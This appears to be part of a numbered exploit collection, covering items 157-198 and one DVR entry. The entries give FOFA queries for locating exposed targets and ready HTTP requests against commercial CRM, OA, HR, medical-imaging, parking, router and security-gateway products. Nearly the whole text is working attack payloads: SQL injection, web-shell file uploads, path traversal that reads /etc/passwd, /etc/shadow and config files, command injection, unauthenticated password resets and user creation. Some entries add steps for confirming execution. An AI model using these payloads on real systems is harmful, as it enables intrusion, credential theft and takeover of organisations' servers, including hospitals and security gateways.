curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The name parameter supplies the extension of the stored file and the request body is written as its content, so the .ashx handler above executes when it is requested; "test" in the response confirms execution.

193. Hillstone (山石网科) Yunjian Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Fetch a CSRF token with an arbitrary PHPSESSID (the same cookie value is reused in step 2):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Submit the command with that token; as the PoC shows, the param value is evaluated server-side as Python, hence os.system:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. The written file is served under /master/img/, so read it back to confirm execution (the response should contain 23333333333456):
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE Collaboration Platform (飞企互联 FE企业运营管理平台) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the endpoint is exposed and the target is likely vulnerable.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename traverses out of the attachment directory into the deployed fe.war, so the JSP lands inside the web application itself (check for hello.jsp at the application root).

195. Volans (飞鱼星) Enterprise Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is concatenated into a shell command; the output of uname -a in the response confirms execution.

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

xgh (学工号) is the student/staff number of the target account and newPass the password it is set to; the request carries no authentication.

197. Zheda Enter (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js suffix is part of the PoC path and must be sent as written; the goonumStr value is placed unquoted into the query, and 12321 (111*111) in the response indicates the UNION executed.

198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

